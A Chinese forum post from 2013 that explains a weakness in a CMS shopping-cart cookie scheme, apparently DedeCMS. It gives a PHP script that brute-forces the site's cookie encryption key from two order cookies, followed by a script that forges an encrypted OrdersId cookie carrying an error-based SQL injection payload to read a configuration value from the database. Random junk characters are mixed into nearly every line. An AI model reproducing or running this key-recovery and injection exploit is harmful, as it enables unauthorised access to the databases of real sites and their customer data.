www.xxx.com/plus/search.php?keyword=
: s6 i4 V6 [+ c在 include/shopcar.class.php中3 h. P3 i5 ?/ O4 k8 s8 u
先看一下这个shopcar类是如何生成cookie的
: M4 E) A0 V4 ^7 w5 U239 function saveCookie($key,$value)8 b ]- [# N6 B& F; K! n- \
240 {
% R K' V2 ?1 R; c6 Q241 if(is_array($value))0 v2 A+ t) K/ f3 B
242 {
1 r4 F! a8 J, Q2 n. w I2 x243 $value = $this->enCrypt($this->enCode($value));1 Z" a( f, M& w# w8 q! O
244 }
7 N7 O& w6 F6 y( ~1 _245 else
# z D* C5 L# i3 A; h7 W7 D! N246 {
' s( t7 s! v4 {: N247 $value = $this->enCrypt($value);& v% r- M& Y% Z) A$ Y! `
248 }
6 x# r8 N! }- |249 setcookie($key,$value,time()+36000,’/');
{* B" E! l' h) i6 @/ Q) {250 }
" ]* {3 G9 D+ d/ N, {# C& Y简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数% `% B$ X. s k1 J3 l8 {1 W& ~& N; o5 x
186 function enCrypt($txt)
3 ]0 S5 i! Q$ d9 X9 y6 f187 {) T7 X% L0 a& x1 x$ z9 S
188 srand((double)microtime() * 1000000);+ i t/ w- u% z3 t" j+ b- s% E+ H
189 $encrypt_key = md5(rand(0, 32000));
/ q5 N/ \& r5 n190 $ctr = 0;9 O4 v0 c8 o+ ^: H3 X% G* O
191 $tmp = ”;
5 @* y. w) Q& `0 E g5 }192 for($i = 0; $i < strlen($txt); $i++)+ g" i) n7 p2 d A% \
193 {
. n% l) S: |0 N194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; t) P' I% v5 z" B6 Q9 r: v) M2 Y
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
# P: q6 w$ D2 C1 n196 }
' ^( t- r4 e v197 return base64_encode($this->setKey($tmp));6 `8 ]% D8 y v8 L
198 }2 i4 b. l, D$ W3 t& z) m& P
213 function setKey($txt)
6 a0 D& k/ O! ^' o& f214 {5 v6 @: f( r1 H* [' h3 k
215 global $cfg_cookie_encode;0 F1 r0 Y5 t" c* l9 ]$ c2 R
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
+ b/ A; u3 D( | Y217 $ctr = 0;
$ ?1 |& w& p+ k# E% z% {218 $tmp = ”;
: n, N! H, D" ]+ ^# v9 S. O, v219 for($i = 0; $i < strlen($txt); $i++)" `0 L! g( R" V
220 {$ j* w. c9 q) h
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;5 ~1 A1 g- U( s* n( |9 ~- o3 _$ R: Q
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];0 o9 e1 C$ l1 r% X3 @
223 }, Y. Z x6 M/ \; t
224 return $tmp;! q! V, W4 v1 p$ L$ F7 k
225 }5 ?. {/ `, V) H: T+ _ o
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
, H7 E3 I1 _7 _! L# X, u0 W5 O3 d5 B然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。; Q1 ^+ [; d* T; [6 H/ a
具体代码如下:
* B S, E5 O4 n<?php" v) Z0 Z2 A3 z$ e, R/ u
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
8 f8 v0 l* [7 Q$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
8 [, N# |! y; Z8 o! B$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here0 B( g/ _' t- G& M4 d0 y( u
function reStrCode($code,$string)9 C3 H; A, V0 @) B0 _
{5 b. B! @ }2 H. [7 @! f2 O
$code = base64_decode($code);
7 E# B2 b7 T5 L! v$key = “”;+ s8 t' }$ F; D
for($i=0 ; $i<32 ; $i++)) ^9 R5 {3 @; c0 s N
{4 t, ?$ R# Z# r
$key .= $string[$i] ^ $code[$i];) L0 ?1 {0 B K& v! r1 D
}
' N. g# Y. q) B! g: c7 p1 wreturn $key;
0 d+ Y; _1 j- x3 z3 ` T4 w* d}
& T E9 t Y y- p `) Hfunction getKeys($cookie,$plantxt)! M1 e4 ~4 F! M
{ _& w; L t( q% z+ `" t3 D# {
$tmp = $cookie;5 y, u3 X: i0 Q: ~
$results = array();' i. G, f: w5 b' t6 e2 V- {
for($j=0 ; $j < 32000; $j++)+ d' k2 F. X r0 J' ]/ N
{
6 _# w" h s, |0 O: X
~; @% J6 M$ Y# @4 Y7 o- c. Y+ K$txt = $plantxt;2 R- @# v1 C: R, j/ I
$ctr = 0;
1 @4 g0 o* e8 h; T& b$ V$tmp = ”;
5 u6 `4 K# T6 `5 ?9 ^, c) m$encrypt_key = md5($j);
7 P+ X8 x, s1 N) J2 nfor($i =0; $i < strlen($txt); $i ++). ] ? i t+ Q
{8 z, s4 g7 A, a3 ?
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
* F# t$ V) k- k% [$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);3 E4 a1 w% O+ m2 w' ?, V
}5 n% ?# A2 ^* q# V' S4 z
$string = $tmp;* H b; q) f& i# Q
$code = $cookie;
. `' [$ x) M$ L/ h3 z9 x- O( `$result = reStrCode($code,$string);1 w/ A3 \- S' c' D2 Q$ a2 ?5 j8 ^3 O
if(eregi(‘^[a-z0-9]+$’,$result))# }$ i1 F3 C+ T0 g, t) C5 J
{2 G* O: K& \; T
echo $result.”\n”;
- g/ I, a$ M9 W$ W$results[] = $result;
. L+ r, ^, M/ r6 c( E% Z( j1 _5 w6 @}" S- S+ f6 S7 Q* x+ M5 \
}
H7 ?, h1 F+ C, P/ Wreturn $results;9 e% w6 ~1 N& H0 w1 g/ g1 B
}
u( a8 Y( Y; V. \; j$results1 = getKeys($cookie1,$plantxt);+ a+ q& u' ]/ g4 ?8 o
$results2 = getKeys($cookie2,$plantxt);
% g! W5 I7 i0 a) b! Mprint “\n——————–real key————————–\n”;
Y7 X$ ~! d$ b9 gforeach($results1 as $test1)
5 K% V' k# H0 q0 t) @& w) \$ s{7 q. h# ?3 B$ q$ N5 ]7 L
foreach($results2 as $test2)
2 M* R5 g6 v9 z9 B{
5 b6 J& f$ [7 w2 S5 N% [* G7 n9 c+ Zif($test1 == $test2)$ Z# m8 ~8 c' X+ L$ G, \( ?
{6 O! f; d: Q* k5 i; p% N) M
echo $test1.”\n”;
8 ]4 E$ P) N4 F4 J: r$ E}
2 O( B, R. j2 H/ G; ?6 |3 j}5 D! k4 U- ^ O- s5 x; o
}
9 }' f8 }+ ^ o?>
& U5 Q' v; R! p1 X" jcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
8 S/ c r2 B+ r( b" jplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1% O [0 n2 \# ]" R' F% u9 `
然后推算出md5(strtolower($cfg_cookie_encode))
5 p6 p+ ^( p# Q得到这个key之后,我们就可以构造任意购物车的cookie' `3 H8 f: R7 h" [/ {2 a3 x
接着看
8 W- d! N' n: c3 b; [20 class MemberShops r4 Z0 Z; ?# @+ T4 @, k
21 {
' i3 r5 ]. R# z, k( p22 var $OrdersId;
0 J8 J9 Y' N; V7 d x( {# g2 u# A23 var $productsId;
1 s& u! r% K9 D$ M) d0 k# }( _, y24
- u" |1 Q$ { R8 [& Q25 function __construct()6 n1 }) @* c9 g' ^
26 {
+ b: q- `' \- q. e6 Z- y* { l( p8 P, ]27 $this->OrdersId = $this->getCookie(“OrdersId”);
& I9 C/ R1 w; ?2 a* a. Q- N( i7 x- m28 if(empty($this->OrdersId))' t( n3 g5 E5 k8 l
29 {1 z' V5 `: f1 |! f% I4 {
30 $this->OrdersId = $this->MakeOrders();+ n: d3 v9 Q! G% v$ M6 e
31 }% C: Z& `- R h
32 }3 j/ N3 @; O6 C9 X4 {" `) @% \
发现OrderId是从cookie里面获取的2 B) i2 \) o( Z9 y6 _- q
然后
$ t) V3 [% O7 d/ _9 G4 A8 K! |0 ^/plus/carbuyaction.php中的
) e$ B% ^- j8 o$ [+ p9 U( b1 H R29 $cart = new MemberShops();
, Z! L |& E( X# n7 m: s39 $OrdersId = $cart->OrdersId; //本次记录的订单号/ C& f2 w/ R/ D) j
……+ u3 J7 P4 C5 u0 }6 L. U. @
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
! O: D5 u1 L7 S% o接着我们就可以注入了7 Q' | k- h# T+ P& k8 o$ E
通过利用下面代码生成cookie:6 {' T7 B. q+ r0 g( J5 K8 N' A' d& t
<?php4 p& K" d3 D! L w$ C
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″; G/ H$ V! r' D1 j
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
6 n, O; y/ d8 e. o; v3 u6 Dfunction setKey($txt)/ _; L4 E+ M' K# @
{
6 m% @6 Q5 C8 T' r0 Y" u9 h- } \global $encrypt_key;3 C5 w( `- c; O) L
$ctr = 0;
" D5 j/ F6 u! i6 `, e$tmp = ”;, F" [& Q# d: l" U- h$ v
for($i = 0; $i < strlen($txt); $i++)6 g" O! U; [/ o5 X' c' h w) I# y
{3 c6 d. k W; t/ `; W# q
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;, T% _& m5 ^0 u3 c
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];. l. ?6 E, o* Q" [2 s$ m: | q
}
1 s7 u7 l1 r/ D! wreturn $tmp; {/ p) P7 n1 r4 p
}
/ {& U+ T1 d/ u+ Q# {function enCrypt($txt)
! Z# t* b/ V5 k- A7 j+ A{
! Q# W5 {! n1 l) K0 S! asrand((double)microtime() * 1000000);' s$ ~/ v. S; U* g" J' c# V j
$encrypt_key = md5(rand(0, 32000));4 i0 d8 j5 m& Q* ]0 A# d i# U' c1 I
$ctr = 0;
" }# R$ C% z6 l8 G" G$tmp = ”;
2 G- j m% b3 F/ l/ a, y l. L9 k, \! L5 Ufor($i = 0; $i < strlen($txt); $i++)
( I$ v/ e3 Q$ _0 V( @! }; Y; N{
5 I7 }4 R2 _" r" {. ~% S& ~$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
. ^( f/ m, c) q* {$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
5 X. Z0 ?3 q5 K6 t% d- m$ `}
; c$ V9 N% h" N2 [ e1 f& Ureturn base64_encode(setKey($tmp));7 [4 q$ S9 o8 K5 A* `9 U
}8 s% S/ i8 H! C; X: s- Z0 w; q
for($dest =0;$dest = enCrypt($txt);)
$ F/ ~0 r. u6 p& C( ~{
+ K, T3 x2 B7 K7 M1 N, cif(!strpos($dest,’+'))# d C- @$ |1 F+ I
{3 z% J E5 f3 i7 q4 P
break;+ X$ K/ w) [1 C5 _$ x) e
}) N) X) S5 k; [" @& S
}
% y W M" y! z0 hecho $dest.”\n”;4 u3 A; ? S& f( R* d+ X
?>
c9 B; y* a" Q. ^2 r' w4 K; E9 M: v' D+ }) |9 r# ]6 f# X" s5 S& A8 o) a( a
|
发表于 2013-2-13 23:58:29
收藏
支持
反对